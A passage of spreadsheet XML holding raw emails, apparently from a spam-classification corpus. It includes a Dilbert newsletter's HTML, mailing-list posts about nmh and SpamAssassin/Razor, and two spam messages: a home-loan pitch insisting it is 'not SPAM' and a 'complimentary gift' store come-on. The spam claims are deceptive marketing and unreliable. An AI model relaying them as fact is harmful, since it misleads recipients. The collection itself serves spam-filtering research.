 ctible tins.&lt;BR&gt;&lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedm=
 edia.com:80/Click?q=3D0e--eDTIiQKh-FBGHk4rLdEHR-t69RR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;=
 /TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" HEIGHT=3D"59" BGCOLOR=3D"#FFFFFF" ROWSPAN=
 =3D"2"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"10" HEIGHT=3D"10" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"162" HEIGHT=3D"24" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"2"&gt;&lt;FONT FACE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/clothing_and_posters.gif" WIDTH=
 =3D"121" HEIGHT=3D"15" BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;Get any Dilbert strip publ=
 ished in the last 90 days printed on a&lt;BR&gt;T-shirt, sweatshirt or poster. Se=
 lected older strips are also available.&lt;BR&gt;
 &lt;B&gt;&amp;gt; &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Clic=
 k?q=3D4d--UisIKZgQAPcJXtdaN021jq-0dRR"&gt;Shop&lt;/A&gt;&lt;/B&gt;&lt;BR&gt;
 &lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif" WIDT=
 H=3D"148" HEIGHT=3D"20" BORDER=3D"0" ALT=3D""&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09&lt;TD WIDTH=3D"14" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"=
 http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gif" WIDTH=
 =3D"14" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"148" HEIGHT=3D"35" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT FA=
 CE=3D"Arial,Verdana" SIZE=3D"1"&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4=
 .unitedmedia.com:80/Click?q=3D78-d5tsIdUgxA-ILq45viMd-qmfZRRR"&gt;View all pro=
 ducts&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"585" HEIGHT=3D"5" BGCOLOR=3D"#FFFFFF" COLSPAN=
 =3D"7"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"585" HEIGHT=3D"5" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;!-- COMIC STRIP HERE --&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF"&gt;&lt;FONT face=3D"helvet=
 ica, arial" size=3D1&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily=
 _dilbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0=
 "&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D=
 a2-6-07QXZoT75_b-b9R6C1DQolgRRR"&gt;Modify Your Account&lt;/A&gt;/&lt;A target=3D"_blan=
 k" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dcc-h4hQQ0OYt05QRqU7q=
 lZmmgdcodRR"&gt;Unsubscribe&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;TD ALIGN=3D"RIGHT" BGCOLOR=3D"#FFF=
 FFF" COLSPAN=3D"7"&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A target=3D"=
 _blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D0b-0NK-INQtdu43=
 V6TGfwmMRCSDiRRR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_di=
 lbert/images/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;B=
 uy This Strip&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A HREF=3D"http://www.comics.com/webmail=
 /SendAStrip?AppName=3DSendAStrip&amp;ComicName=3D/comics/dilbert/&amp;Attachments=
 =3D/comics/dilbert/archive/images/dilbert2002020897712.gif&amp;EmailDate=3DJuly=
 -12-2002"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/im=
 ages/bullet.gif" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Send This=
  Strip to a Friend&lt;/A&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;A target=3D"_blank" HREF=3D"http:/=
 /ummail4.unitedmedia.com:80/Click?q=3D35-d6zTIbIKYiOf1vJKNUL9GnZd-dRR"&gt;&lt;IMG=
  SRC=3D"http://www.comics.com/comics/dilbert/daily_dilbert/images/bullet.gi=
 f" WIDTH=3D"14" HEIGHT=3D"11" ALT=3D"" BORDER=3D"0"&gt;Month of Dilbert&lt;/A&gt;&amp;nb=
 sp;&amp;nbsp;&lt;/FONT&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
                 &lt;TD ALIGN=3D"LEFT" BGCOLOR=3D"#FFFFFF" COLSPAN=3D"10"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D5f-WKGB=
 IIKr2F1N7ac6flzrB6C6M9RR"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/=
 archive/images/dilbert2002020897712.gif" BORDER=3D"0" ALT=3D"You need to go=
  online to see today's strip and other cool features on the Daily Dilbert."=
 &gt;&lt;/A&gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.=
 gif" WIDTH=3D"600" HEIGHT=3D"8" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- ONLINE STORE AND STRIP TABLE END --&gt;
 =09=09=09
 =09=09=09&lt;!-- FOOTER TABLE BEGIN --&gt;
 =09=09=09&lt;TABLE WIDTH=3D"610" CELLPADDING=3D"0" CELLSPACING=3D"0" BORDER=3D=
 "0"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" HEIGHT=3D"1" BGCOLOR=3D"#003366" COLSPAN=
 =3D"8"&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gi=
 f" WIDTH=3D"610" HEIGHT=3D"1" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"1" BGCOLOR=3D"#003366"&gt;&lt;IMG SRC=3D"http://www.c=
 omics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"1" HEIGHT=3D"4" BOR=
 DER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"478" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www=
 .comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"478" HEIGHT=3D"4"=
  BORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;FONT FACE=3D"helvetica, arial" SIZE=3D"1"&gt;&lt;A ta=
 rget=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3D74-VAw8=
 IZZ5N6JYWnTRYD8jnzvMpRRR"&gt;Unsubscribe&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"ht=
 tp://ummail4.unitedmedia.com:80/Click?q=3D8a-3y2dQXn0a3b1njBO3Btq9D6yURRR"&gt;=
 Modify Your Subscription&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"http://ummail4.=
 unitedmedia.com:80/Click?q=3D9f-o7QMQ1J0LNPar6BYlZGsyOF6BdRR"&gt;Request a New=
  Subscription&lt;/A&gt; | &lt;a href=3D"mailto:dilberthelp@unitedmedia.com"&gt;Report S=
 ubscription Problems&lt;/A&gt;&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Db4=
 -aJFbQ6Z3xK4DoxAqJ7DOkTHEPsRR"&gt;Subscribe to the Dilbert Newsletter/Join Dog=
 bert's New Ruling Class&lt;/A&gt; |&lt;BR&gt;
 &lt;A target=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dc9=
 -3OPLQpgOU3meSfAjg6SO6eP2hsRR"&gt;Dilbert on Your Site/Intranet&lt;/A&gt; | &lt;A targe=
 t=3D"_blank" HREF=3D"http://ummail4.unitedmedia.com:80/Click?q=3Dde-7tLkQMW=
 9O-M85oMtTKD2NHz7HRRR"&gt;Advertising Info&lt;/A&gt; | &lt;A target=3D"_blank" HREF=3D"=
 http://ummail4.unitedmedia.com:80/Click?q=3Df3-LjVgQJOyj9GfIYSCsHCfK5y7mRRR=
 "&gt;Dilbert in Your Publication&lt;/A&gt;&lt;/FONT&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"45" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"45" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"62" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"62" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;BR&gt;&lt;A target=3D"_blank" HREF=3D"http://ummail4.united=
 media.com:80/Click?q=3D08-IFHQIRj_Ulst0mKg3u-VQtLAidRR"&gt;&lt;IMG SRC=3D"http://=
 www.comics.com/comics/dilbert/daily_dilbert/images/comics_com_logo.gif" WID=
 TH=3D"62" HEIGHT=3D"42" BORDER=3D"0" ALT=3D"Comics.com"&gt;&lt;/A&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"10" BGCOLOR=3D"#FFFFFF"&gt;&lt;IMG SRC=3D"http://www.=
 comics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"10" HEIGHT=3D"4" B=
 ORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09=09&lt;TD WIDTH=3D"4" BACKGROUND=3D"http://www.comics.com/comics/d=
 ilbert/daily_dilbert/images/white_line_right.gif"&gt;&lt;IMG SRC=3D"http://www.co=
 mics.com/comics/dilbert/images/clear_dot.gif" WIDTH=3D"4" HEIGHT=3D"4" BORD=
 ER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;=09
 =09=09=09=09=09&lt;TD WIDTH=3D"610" COLSPAN=3D"8"&gt;&lt;IMG SRC=3D"http://www.comic=
 s.com/comics/dilbert/daily_dilbert/images/daily_dilbert_footer.gif" WIDTH=
 =3D"610" HEIGHT=3D"11" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/TABLE&gt;
 =09=09=09&lt;!-- FOOTER TABLE END --&gt;
 =09=09=09
 =09=09&lt;/TD&gt;
 =09=09&lt;TD&gt;
 =09=09
 =09=09=09
 =09=09
 =09=09=09&lt;!-- SKYSCRAPER TABLE BEGIN --&gt;
 =09=09=09&lt;table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" height=3D"=
 600"&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/=
 small_ad.gif" WIDTH=3D"20" HEIGHT=3D"11" BORDER=3D"0" ALT=3D"Advertisement"=
 &gt;&lt;BR&gt;&lt;IMG SRC=3D"http://www.comics.com/comics/dilbert/images/clear_dot.gif"=
  WIDTH=3D"2" HEIGHT=3D"2" BORDER=3D"0" ALT=3D""&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09=09&lt;TR VALIGN=3D"TOP"&gt;
 =09=09=09=09=09&lt;TD&gt;&lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=
 =3D1D74C2EA&amp;pcode=3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flow=
 go.com/images/bt/p2p.gif?ccode=3D1D74C2EA&amp;pcode=3DEF39755C" width=3D120 hei=
 ght=3D600 border=3D0&gt;&lt;/a&gt;&lt;/TD&gt;
 =09=09=09=09&lt;/TR&gt;
 =09=09=09&lt;/table&gt;
 =09=09=09&lt;!-- SKYSCRAPER TABLE END --&gt;
 =09=09=09
 =09=09=09
 =09=09=09
 =09=09&lt;/TD&gt;
 =09&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;!-- CONTENT AND SKYSCRAPER AD TABLE END --&gt;
 &lt;a href=3D"http://www.partner2profit.com/redir.cfm?ccode=3DAFEBB3C4&amp;pcode=
 =3DEF39755C" target=3D"_blank"&gt;&lt;img src=3D"http://www.flowgo.com/images/bt/=
 p2p.gif?ccode=3DAFEBB3C4&amp;pcode=3DEF39755C" width=3D"120" height=3D"600" bor=
 der=3D"0"&gt;&lt;/a&gt;
 &lt;/TD&gt;
 &lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://ummail4.unitedmedia.com:80/Click?q=
 =3D1d-6KtjnKQlqzNmQKGN_opQCQxK"&gt;
 --18376580.1026469116368.JavaMail.root.umsan1--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Acopia Networks?
</t>
  </si>
  <si>
    <t xml:space="preserve">Yet another pre-interview query.   I don't know a thing about them that 
 isn't on their mostly-uninformative web site.   Charles River Ventures led 
 a $10 million round of financing in January of this year.
 One of their techie founders wrote a paper on a protocol to allow 
 out-of-order image chunk delivery for image types that can be rendered 
 that way.   
 Eirikur
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">--==_Exmh_-398538836P
 Content-Type: text/plain; charset=us-ascii
 &gt; From:  Robert Elz &lt;kre@munnari.OZ.AU&gt;
 &gt; Date:  Thu, 22 Aug 2002 18:32:00 +0700
 &gt;
 &gt;     Date:        Wed, 21 Aug 2002 10:54:46 -0500
 &gt;     From:        Chris Garrigues &lt;cwg-dated-1030377287.06fa6d@DeepEddy.Com&gt;
 &gt;     Message-ID:  &lt;1029945287.4797.TMDA@deepeddy.vircio.com&gt;
 &gt; 
 &gt;   | I can't reproduce this error.
 &gt; 
 &gt; Ah, I think I just found the cause, nmh is broken (which is probably
 &gt; obvious from my previous mail).
 &gt; 
 &gt; The man page for pick (and how it always used to work) was that -list
 &gt; would list messages matched.  -nolist would supress that.   If -sequence
 &gt; is given the default is -nolist, without -sequence the default is -list.
 &gt; 
 &gt; That's all fine - but it appears now (which probably means I had never
 &gt; used pick since I upgraded nmh last) that what counts is the order of
 &gt; -list and -sequence - that is, if -sequence comes after -list, the -list
 &gt; gets turned off (-sequence implies -nolist instead of just making -nolist
 &gt; the default).
 &gt; 
 &gt; An easy workaround for this is to make sure that -list is the last arg
 &gt; given to pick, so if I run ...
 &gt; 
 &gt; delta$ pick +inbox -lbrace -lbrace -subject ftp -rbrace -rbrace  4852-4852 
 &gt; -sequence mercury -list
 &gt; 4852
 &gt; 
 &gt; which is just as it should be.
 hmmm, I assume you're going to report this to the nmh folks?
 Chris
 -- 
 Chris Garrigues                 http://www.DeepEddy.Com/~cwg/
 virCIO                          http://www.virCIO.Com
 716 Congress, Suite 200
 Austin, TX  78701		+1 512 374 0500
   World War III:  The Wrong-Doers Vs. the Evil-Doers.
 --==_Exmh_-398538836P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: Exmh version 2.2_20000822 06/23/2000
 iD8DBQE9ZP1lK9b4h5R0IUIRAhSFAJ0dWespJZxDa1q6t1yyulLXBp1ryACfUF+D
 ltpgX3KXYwpbhGV2bUHY6gY=
 =H9ck
 -----END PGP SIGNATURE-----
 --==_Exmh_-398538836P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Home Loans Just Got Better!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;We are Loan Specialists&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"Microsoft FrontPage 4.0" name=3DGENERATOR&gt;
 &lt;META content=3DFrontPage.Editor.Document name=3DProgId&gt;&lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;P align=3Dcenter&gt;&lt;font color=3D"#D6321B" face=3D"Arial" size=3D"4"&gt;&lt;b&gt;Fre=
 e Service to
 Homeowners!&amp;nbsp;&lt;br&gt;
 Home Loans Available For Any Situation.&lt;/b&gt;&lt;/font&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;img border=3D"0" src=3D"http://www.u1.pp.ru/user534/mor=
 tg/MO_mort_illustration.jpg"
 width=3D"175" height=3D"70"&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;font size=3D"3"&gt;&amp;nbsp;&lt;font color=3D=
 "#0000FF"&gt;&lt;b&gt;Whether
 your credit rating is A++ or you are &amp;quot;credit challenged&amp;quot;,&lt;br&gt;
 we have many loan programs through hundreds of lenders.&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/=
 font&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;b&gt;&lt;font size=3D"3" face=3D"Arial" color=3D"#D6321B"&gt;Sec=
 ond Mortgages&lt;/font&gt;&lt;font
 size=3D"3" face=3D"Arial" color=3D"#000000"&gt; - We can help you get up to 1=
 25% of your
 homes value (ratios vary by state).&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;b&gt;&lt;font size=3D"3" face=3D"Arial" color=3D"#D6321B"&gt;Ref=
 inancing&lt;/font&gt;&lt;font
 size=3D"3" face=3D"Arial" color=3D"#000000"&gt; - Reduce your monthly payment=
 s and get
 cash back.&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
 &lt;P align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;font size=3D"3"&gt;&lt;b&gt;&lt;font color=3D"#D=
 6321B"&gt;Debt
 Consolidation&lt;/font&gt;&lt;font color=3D"#000000"&gt; - Combine all your bills into=
  one,
 and save money every month.&amp;nbsp;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 &lt;/font&gt;&lt;BR&gt;&lt;B&gt;&lt;FONT 
 color=3D#d6321b size=3D4&gt;&lt;a href=3D"http://www.u1.pp.ru/user534/mortg/inde=
 x.html"&gt;CLICK 
 HERE For All Details And A Free Loan Quotation 
 Today!&lt;/a&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;HR width=3D"50%" color=3D#ff0000&gt;
 &lt;P align=3Dcenter&gt;&lt;I&gt;&lt;font face=3D"Arial" color=3D"#000000" size=3D"2"&gt;We =
 strongly oppose the 
 use of SPAM email and do not want anyone who does not wish to receive 
 our&amp;nbsp;&lt;BR&gt;mailings to receive them. As a result, we have retained the 
 services of an independent 3rd party to&amp;nbsp;&lt;BR&gt;administer our list manag=
 ement 
 and remove list (&lt;A 
 href=3D"http://www.removeyou.com/"&gt;http://www.removeyou.com/&lt;/A&gt;). This is=
  not 
 SPAM. If you&amp;nbsp;&lt;BR&gt;do not wish to receive further mailings, please clic=
 k 
 below and enter your email at the bottom&amp;nbsp;&lt;BR&gt;of the page. You may the=
 n 
 rest-assured that you will never receive another email from us&amp;nbsp;&lt;BR&gt;ag=
 ain. 
 &lt;A href=3D"http://www.removeyou.com/"&gt;http://www.removeyou.com/&lt;/A&gt; The 21=
 st 
 Century Solution. I.D. # 023154&lt;/font&gt;&lt;/I&gt;&lt;/P&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [Razor-users] New to razor
</t>
  </si>
  <si>
    <t xml:space="preserve">I concur, but just ignore the razor errors during the make test of
 spamassassin.  That recently started failing but appears just to be the
 test failing.  
 -----Original Message-----
 From: Justin Mason [mailto:yyyy@spamassassin.taint.org] 
 Sent: Thursday, August 08, 2002 9:07 AM
 To: Michael Graff
 Cc: razor-users@example.sourceforge.net
 Subject: Re: [Razor-users] New to razor 
 Michael Graff said:
 &gt; I'm trying to get spamassassin 2.31 and razor (latest) to play 
 &gt; together.  From what I see, this isn't likely to happen trivially,
 Mike -- use the CVS version of SpamAssassin.  it works well and supports
 Razor 2.
 --j.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net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t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Wishing you a wonderful day
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_84815C5ABAF209EF376268C8
 Content-type: text/plain; charset=windows-1252
 Content-Transfer-Encoding: quoted-printable
 Welcome to Johnson Home Products &amp; Services
 http://www=2Ejohnsonhome2276=2Ecom
 YOUR COMPLIMENTARY GIFT From Johnson Home P &amp; S Register TODAY! if haven't=
  already=2E
 Hurry while supplies Last=2E Free Gift Offer at my expense=2E
 http://home=2Eattbi=2Ecom/~johnsonhomestor1/YOUR_COMPLIMENTARY_GIFT=2Ehtx
 ------=_NextPart_84815C5ABAF209EF376268C8
 Content-Type: text/html; charset=windows-1252
 Content-Transfer-Encoding: quoted-printable
 &lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1=2E0 Transitional//EN"
 "http://www=2Ew3=2Eorg/TR/xhtml1/DTD/xhtml1-transitional=2Edtd"&gt;
 &lt;title&gt;welcome letter&lt;/title&gt;
 &lt;style type=3D"text/css"&gt;
  div=2Ec6 {color: #000000; text-align: center}
  span=2Ec5 {color: #000000}
  span=2Ec4 {color: #000000}
  div=2Ec3 {text-align: center}
  span=2Ec2 {color: #000000}
  span=2Ec1 {color: #000000}
 &lt;/style&gt;
 &lt;div class=3D"c3"&gt;&lt;span class=3D"c1"&gt;&lt;b&gt;&lt;font color=3D"#6633ff"&gt;&lt;i&gt;&lt;u&gt;&lt;big=
 &gt;Welcome to Johnson
 Home Products &amp;amp; Services J=2EH
 p&amp;amp;s&lt;/big&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;/span&gt;&lt;br /&gt;
 &lt;br /&gt;
 &lt;span class=3D"c2"&gt;&lt;b&gt;&lt;i&gt;&lt;big&gt;Online Shopping Over 1500
 Quality&lt;br /&gt;
  Products &amp;amp; Many Great Online Features and
 Services!&lt;/big&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
 &lt;br /&gt;
 &lt;span class=3D"c5"&gt;&lt;b&gt;Dear Madam/Sir&lt;br /&gt;
 &lt;span class=3D"c2"&gt;&lt;b&gt;@&lt;/b&gt;&lt;span class=3D
 "c4"&gt;&lt;b&gt;-&amp;gt;-&amp;gt;-&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
 Let me first say Welcome and to introduce myself to you=2E My name
 Bob Johnson, I operate J=2EH p&amp;amp;s online store from my home out
 Muskegon Michigan=2E&lt;br /&gt;
  J=2EH p&amp;amp;s online store has been online since Nov 1st of
 2001=2E&lt;br /&gt;
  Our warehouse is located in Utah, where most of the online items
 are sent from=2E&lt;br /&gt;
 &lt;br /&gt;
  To begin an Relationship with Potential customers, and to earn
 your Trust, I am offering you a Complimentary Gift=2E Sent you at my expen=
 se=2E Just for
 registering with J=2EH p&amp;amp;s online store=2E There is no fees to registe=
 r=2E&lt;br /&gt;
 There no catch , simple register with my online store and I will send you =
 one free gift out of the choices that are available=2E
 &lt;br /&gt;
  &lt;a href=3D
 "http://home=2Eattbi=2Ecom/~johnsonhomestor1/YOUR_COMPLIMENTARY_GIFT=2Ehtx=
 "&gt;
 &lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/FREEGIFT=2Egif" hei=
 ght=3D"175" width=3D"313"&gt;
 &lt;img src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHfreeprom=2Ejpg"
  border=3D"0" alt=3D
 "We would Like to get to know you, and For you to get to know us=2E Click =
 on to claim your FREE Gift Offer=2E Thank you!" /&gt;&lt;/a&gt;
 &lt;BR&gt;Please click on to claim your complimentary gift=2E&lt;br /&gt;
  There are Seven Different Gifts to choose From=2E&lt;br /&gt;
  Plus once you become registered with J=2EH p&amp;amp;s online
 Store=2E&lt;br /&gt;While Supplies last&lt;br&gt;
  You will be enter in the monthly drawing contest every month
 automatically=2E&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
  &lt;span class=3D"c1"&gt;My promise and guarantee to you,&lt;/span&gt;&lt;br /&gt;
 &lt;span class=3D"c2"&gt;&lt;b&gt;I will never give away or sell your
 information to any one=2E Once I receive your information It is
 printed out and put in a paper file, and then deleted from my
 computer=2E Your first and last name and email address may be added
 to our email list only for sending you special deals and updates
 about J=2EH p&amp;amp;s online store=2E&lt;br /&gt;
  The winners of the Drawing contest, last name and the state they
 live in will be display on J=2EH p&amp;amp;s feature website=2E&lt;br /&gt;
  I am Not one who usually uses the word promise unless I know 100%
 I can keep the promise=2E An from the past few month I sure think
 some is selling my information, because I have more email from
 people and places I never ever heard of=2E and been scam of out
 money myself=2E&lt;/b&gt;&lt;br /&gt;
 &lt;br /&gt;
  My principals and standards are set very high=2E One of my goals
 are to earn an honest living=2E To be honest and up front with
 others as they may cross my path through life=2E&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 &lt;CENTER&gt;
 &lt;br /&gt;
 =20
 &lt;img src=3D"http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/PRODUCTS=
 R=2Egif" height=3D"38" width=3D"100"&gt;
 &lt;BR&gt; &lt;a href=3D"http://ourworld=2Ecs=2Ecom/SOULSTORE37/SAT=2Ehtm"&gt;&lt;img src=
 =3D"http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/SPECIALR=2Egif" =
 height=3D"38" width=3D"170"&gt;&lt;/a&gt;&lt;br /&gt;
  &lt;/CENTER&gt;&lt;br /&gt;
 &lt;a href=3D
 "http://www=2Ejohnsonhome2276=2Ecom/default=2Easp?S=3D500&amp;amp;A=3DF"&gt;
 &lt;img
 src=3D
 "http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/JHproducts=2Ejpg"
  border=3D"0" alt=3D
 "Click on over to view our complete line of quality products, We are now o=
 ffer over 1500 Products online=2E Thank you!" /&gt;&lt;/a&gt;
 Please click on to veiw our complete online Product catalog&lt;br /&gt;
 &lt;br /&gt;&lt;img src=3D"http://johnson2276=2Eitctv=2Ecom/j/johnson2276/Images/TO=
 KENr=2Egif" height=3D"175" width=3D"175"&gt;&lt;br&gt;&lt;br&gt;&lt;/center&gt;
 Every Order You Place You will earn Buying Point, JH P=2ES Tokens=2E&lt;br&gt;
  1  JH P=2ES has a cash value of $0=2E025&lt;br&gt;
  10 JH P=2ES tokens has a Cash Value of $0=2E25&lt;br&gt;
  100 JH P=2ES tokens has a Cash Value of $2=2E50&lt;br&gt;
  1000 JH P=2ES tokens has a Cash Value of $25=2E00&lt;br&gt;
  &lt;br&gt;
  Every $25=2E00 You spend,  Earn's  1 Jh P=2ES Token, Your Token account w=
 ill earn a Cash Value Balance of $0=2E025&lt;br&gt;
  You Can use the tokens to purchase items from our online super store=2E&lt;b=
 r&gt;
  Or have the Cash value of tokens earns,Taken off any order=2E&lt;br&gt;
  All Register Members are Given 100 Token Applied to their Membership Acco=
 unt, After your very first order you place with
  our online store, The Free 100 JH P=2ES tokens in your account will be av=
